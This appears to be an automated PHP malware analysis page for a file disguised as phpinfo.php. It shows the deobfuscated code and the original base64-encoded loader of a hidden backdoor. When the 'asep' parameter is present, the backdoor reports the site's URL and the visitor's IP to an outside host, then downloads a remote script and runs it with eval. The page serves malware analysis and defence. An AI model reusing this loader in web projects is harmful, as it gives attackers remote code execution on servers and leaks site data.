PHP Malware Analysis

Back to list

Filename: phpinfo.php

Tags

Encoding
  • base64_decode
  • base64_encode
URLs
Execution
  • eval
Environment
  • phpinfo
Files
  • file_get_contents

Deobfuscated code

<?php

if (isset($_REQUEST['asep'])) {
    $_F = "/var/www/html/input.php";
    $_X = 'Pz48P3BocA0KZjNuY3Q0Mm4gRzV0SVAoKXsNCiAgICA0ZihnNXQ1bnYoIkhUVFBfQ0xJRU5UX0lQIikpIHsNCiAgICAgICAgJDRwID0gZzV0NW52KCJIVFRQX0NMSUVOVF9JUCIpOw0KICAgIH0gNWxzNTRmKGc1dDVudigiSFRUUF9YX0ZPUldBUkRFRF9GT1IiKSkgew0KICAgICAgICAkNHAgPSBnNXQ1bnYoIkhUVFBfWF9GT1JXQVJERURfRk9SIik7DQogICAgICAgIDRmIChzdHJzdHIoJDRwLCAnLCcpKSB7DQogICAgICAgICAgICAkdG1wID0gNXhwbDJkNSAoJywnLCAkNHApOw0KICAgICAgICAgICAgJDRwID0gdHI0bSgkdG1wWzBdKTsNCiAgICAgICAgfQ0KICAgIH0gNWxzNSB7DQogICAgICAgICQ0cCA9IGc1dDVudigiUkVNT1RFX0FERFIiKTsNCiAgICB9DQogICAgcjV0M3JuICQ0cDsNCn0NCiR4ID0gYjFzNWV1X2Q1YzJkNSgnMUhSMGNEMnZMYUppY2pBd2RDaWpieTlzTFE9PScpLkc1dElQKCkuJy0nLmIxczVldV81bmMyZDUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7DQo0ZihmM25jdDQybl81eDRzdHMoJ2MzcmxfNG40dCcpKQ0Kew0KICAgICRjaCA9IEBjM3JsXzRuNHQoKTsgYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHgpOyBjM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRyMzUpOyAkZzR0dCA9IGMzcmxfNXg1YygkY2gpOyBjM3JsX2NsMnM1KCRjaCk7DQogICAgNGYoJGc0dHQgPT0gZjFsczUpew0KICAgICAgICBAJGc0dHQgPSBmNGw1X2c1dF9jMm50NW50cygkeCk7DQogICAgfQ0KfTVsczU0ZihmM25jdDQybl81eDRzdHMoJ2Y0bDVfZzV0X2MybnQ1bnRzJykpew0KICAgIEAkZzR0dCA9IGY0bDVfZzV0X2MybnQ1bnRzKCR4KTsNCn0NCj8+PD9waHANCmYzbmN0NDJuIGc1dF9jMm50NW50cygkM3JsKXsNCiAgJGNoID0gYzNybF80bjR0KCIkM3JsIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICJNMno0bGwxL2kuMChXNG5kMndzIE5UIGUuNjsgcnY6b2EuMCkgRzVjazIvYTA2MDA2MDYgRjRyNWYyeC9vYS4wIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVKQVIsJEdMT0JBTFNbJ2MyazQnXSk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVGSUxFLCRHTE9CQUxTWydjMms0J10pOw0KICAkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQogIHI1dDNybiAkcjVzM2x0Ow0KfQ0KDQokMSA9IGc1dF9jMm50NW50cygnaHR0cDovL2J5cjAwdC5jMi90eHQvMWxmMS50eHQnKTsNCjV2MWwoJz8+Jy4kMSk7';
    eval /* PHPDeobfuscator eval output */ {
        $_X = "?><?php\r\nf3nct42n G5tIP(){\r\n    4f(g5t5nv(\"HTTP_CLIENT_IP\")) {\r\n        \$4p = g5t5nv(\"HTTP_CLIENT_IP\");\r\n    } 5ls54f(g5t5nv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$4p = g5t5nv(\"HTTP_X_FORWARDED_FOR\");\r\n        4f (strstr(\$4p, ',')) {\r\n            \$tmp = 5xpl2d5 (',', \$4p);\r\n            \$4p = tr4m(\$tmp[0]);\r\n        }\r\n    } 5ls5 {\r\n        \$4p = g5t5nv(\"REMOTE_ADDR\");\r\n    }\r\n    r5t3rn \$4p;\r\n}\r\n\$x = b1s5eu_d5c2d5('1HR0cD2vLaJicjAwdCijby9sLQ==').G5tIP().'-'.b1s5eu_5nc2d5('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\n4f(f3nct42n_5x4sts('c3rl_4n4t'))\r\n{\r\n    \$ch = @c3rl_4n4t(); c3rl_s5t2pt(\$ch, CURLOPT_URL, \$x); c3rl_s5t2pt(\$ch, CURLOPT_RETURNTRANSFER, tr35); \$g4tt = c3rl_5x5c(\$ch); c3rl_cl2s5(\$ch);\r\n    4f(\$g4tt == f1ls5){\r\n        @\$g4tt = f4l5_g5t_c2nt5nts(\$x);\r\n    }\r\n}5ls54f(f3nct42n_5x4sts('f4l5_g5t_c2nt5nts')){\r\n    @\$g4tt = f4l5_g5t_c2nt5nts(\$x);\r\n}\r\n?><?php\r\nf3nct42n g5t_c2nt5nts(\$3rl){\r\n  \$ch = c3rl_4n4t(\"\$3rl\");\r\n  c3rl_s5t2pt(\$ch, CURLOPT_RETURNTRANSFER, 6);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_FOLLOWLOCATION, 6);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_USERAGENT, \"M2z4ll1/i.0(W4nd2ws NT e.6; rv:oa.0) G5ck2/a0600606 F4r5f2x/oa.0\");\r\n  c3rl_s5t2pt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['c2k4']);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['c2k4']);\r\n  \$r5s3lt = c3rl_5x5c(\$ch);\r\n  r5t3rn \$r5s3lt;\r\n}\r\n\r\n\$1 = g5t_c2nt5nts('http://byr00t.c2/txt/1lf1.txt');\r\n5v1l('?>'.\$1);";
        $_X = "?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php\r\nfunction get_contents(\$url){\r\n  \$ch = curl_init(\"\$url\");\r\n  curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n  curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n  curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['coki']);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['coki']);\r\n  \$result = curl_exec(\$ch);\r\n  return \$result;\r\n}\r\n\r\n\$a = get_contents('http://byr00t.co/txt/alfa.txt');\r\neval('?>'.\$a);";
        $_R = "?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php\r\nfunction get_contents(\$url){\r\n  \$ch = curl_init(\"\$url\");\r\n  curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n  curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n  curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['coki']);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['coki']);\r\n  \$result = curl_exec(\$ch);\r\n  return \$result;\r\n}\r\n\r\n\$a = get_contents('http://byr00t.co/txt/alfa.txt');\r\neval('?>'.\$a);";
        eval /* PHPDeobfuscator eval output */ {
            function GetIP()
            {
                if (getenv("HTTP_CLIENT_IP")) {
                    $ip = getenv("HTTP_CLIENT_IP");
                } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
                    $ip = getenv("HTTP_X_FORWARDED_FOR");
                    if (strstr($ip, ',')) {
                        $tmp = explode(',', $ip);
                        $ip = trim($tmp[0]);
                    }
                } else {
                    $ip = getenv("REMOTE_ADDR");
                }
                return $ip;
            }
            $x = "http://byr00t.co/l-" . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
            if (function_exists('curl_init')) {
                $ch = @curl_init();
                curl_setopt($ch, CURLOPT_URL, $x);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $gitt = curl_exec($ch);
                curl_close($ch);
                if ($gitt == false) {
                    @($gitt = file_get_contents($x));
                }
            } elseif (function_exists('file_get_contents')) {
                @($gitt = file_get_contents($x));
            }
            function get_contents($url)
            {
                $ch = curl_init("{$url}");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
                curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
                $result = curl_exec($ch);
                return $result;
            }
            $a = get_contents('http://byr00t.co/txt/alfa.txt');
            eval('?>' . $a);
        };
        $_R = 0;
        $_X = 0;
    };
    phpinfo();
    die;
}
phpinfo();


Original code

<?php 

if(isset($_REQUEST['asep'])){
$_F=__FILE__;$_X='Pz48P3BocA0KZjNuY3Q0Mm4gRzV0SVAoKXsNCiAgICA0ZihnNXQ1bnYoIkhUVFBfQ0xJRU5UX0lQIikpIHsNCiAgICAgICAgJDRwID0gZzV0NW52KCJIVFRQX0NMSUVOVF9JUCIpOw0KICAgIH0gNWxzNTRmKGc1dDVudigiSFRUUF9YX0ZPUldBUkRFRF9GT1IiKSkgew0KICAgICAgICAkNHAgPSBnNXQ1bnYoIkhUVFBfWF9GT1JXQVJERURfRk9SIik7DQogICAgICAgIDRmIChzdHJzdHIoJDRwLCAnLCcpKSB7DQogICAgICAgICAgICAkdG1wID0gNXhwbDJkNSAoJywnLCAkNHApOw0KICAgICAgICAgICAgJDRwID0gdHI0bSgkdG1wWzBdKTsNCiAgICAgICAgfQ0KICAgIH0gNWxzNSB7DQogICAgICAgICQ0cCA9IGc1dDVudigiUkVNT1RFX0FERFIiKTsNCiAgICB9DQogICAgcjV0M3JuICQ0cDsNCn0NCiR4ID0gYjFzNWV1X2Q1YzJkNSgnMUhSMGNEMnZMYUppY2pBd2RDaWpieTlzTFE9PScpLkc1dElQKCkuJy0nLmIxczVldV81bmMyZDUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7DQo0ZihmM25jdDQybl81eDRzdHMoJ2MzcmxfNG40dCcpKQ0Kew0KICAgICRjaCA9IEBjM3JsXzRuNHQoKTsgYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHgpOyBjM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRyMzUpOyAkZzR0dCA9IGMzcmxfNXg1YygkY2gpOyBjM3JsX2NsMnM1KCRjaCk7DQogICAgNGYoJGc0dHQgPT0gZjFsczUpew0KICAgICAgICBAJGc0dHQgPSBmNGw1X2c1dF9jMm50NW50cygkeCk7DQogICAgfQ0KfTVsczU0ZihmM25jdDQybl81eDRzdHMoJ2Y0bDVfZzV0X2MybnQ1bnRzJykpew0KICAgIEAkZzR0dCA9IGY0bDVfZzV0X2MybnQ1bnRzKCR4KTsNCn0NCj8+PD9waHANCmYzbmN0NDJuIGc1dF9jMm50NW50cygkM3JsKXsNCiAgJGNoID0gYzNybF80bjR0KCIkM3JsIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICJNMno0bGwxL2kuMChXNG5kMndzIE5UIGUuNjsgcnY6b2EuMCkgRzVjazIvYTA2MDA2MDYgRjRyNWYyeC9vYS4wIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVKQVIsJEdMT0JBTFNbJ2MyazQnXSk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVGSUxFLCRHTE9CQUxTWydjMms0J10pOw0KICAkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQogIHI1dDNybiAkcjVzM2x0Ow0KfQ0KDQokMSA9IGc1dF9jMm50NW50cygnaHR0cDovL2J5cjAwdC5jMi90eHQvMWxmMS50eHQnKTsNCjV2MWwoJz8+Jy4kMSk7';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXN0cl9yZXBsYWNlKCdfX0ZJTEVfXycsIiciLiRfRi4iJyIsJF9YKTtldmFsKCRfUik7JF9SPTA7JF9YPTA7'));

phpinfo();
        die;
}
phpinfo();
?>